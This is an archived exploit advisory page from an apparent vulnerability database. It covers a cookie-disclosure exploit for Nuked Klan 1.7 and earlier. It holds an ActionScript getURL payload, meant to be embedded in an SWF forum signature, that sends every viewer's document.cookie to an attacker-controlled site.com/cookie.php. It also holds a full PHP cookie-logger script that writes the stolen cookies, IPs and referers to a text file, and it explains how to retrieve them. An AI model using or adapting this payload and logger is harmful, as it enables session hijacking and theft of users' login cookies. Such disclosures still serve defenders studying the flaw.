Lucene search
K

nukedklan17.txt

🗓️ 04 Jan 2007 00:00:00Reported by NeoSSJType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

Nuked Klan 1.7 exploit reveals remote cookie disclosure via crafted SWF files.

Code
`[-] Nuked Klan <= 1.7 Remote Cookie Disclosure Exploit  
[-] Vendor : www.nuked-klan.org/  
[-] Found by NeoSSJ & Kad'  
[-] Full disclosure on 31 December 2006  
  
[-] Notice :   
  
you only have to create a *.swf file, and you put on :   
  
getURL("javascript:alert('document.location="http://site.com/cookie.php?cookie="+document.cookie');");   
  
or anything like that to have the cookie of all the persons who will see the cookie :   
  
[-] Exploitation :   
getURL("javascript:document.location='http://site.com/cookie.php?cookie='+document.cookie");  
  
the php script is anything like that :  
  
<?php  
$cookie = $_GET['cookie'];  
$ip = getenv ('REMOTE_ADDR');  
$date=date("m/d/Y g:i:s a");  
$referer=getenv ('HTTP_REFERER');  
$fl = fopen('cookies.txt', 'a');  
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");  
fclose($fl);  
?>  
  
then you only have to go to http://site.com/cookies.txt, and you have the cookies of   
all the persons who have seen your signature   
  
  
Greetz to : Macromedia Flash Software, and every body who know us.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Jan 2007 00:00Current
7.4High risk
Vulners AI Score7.4
17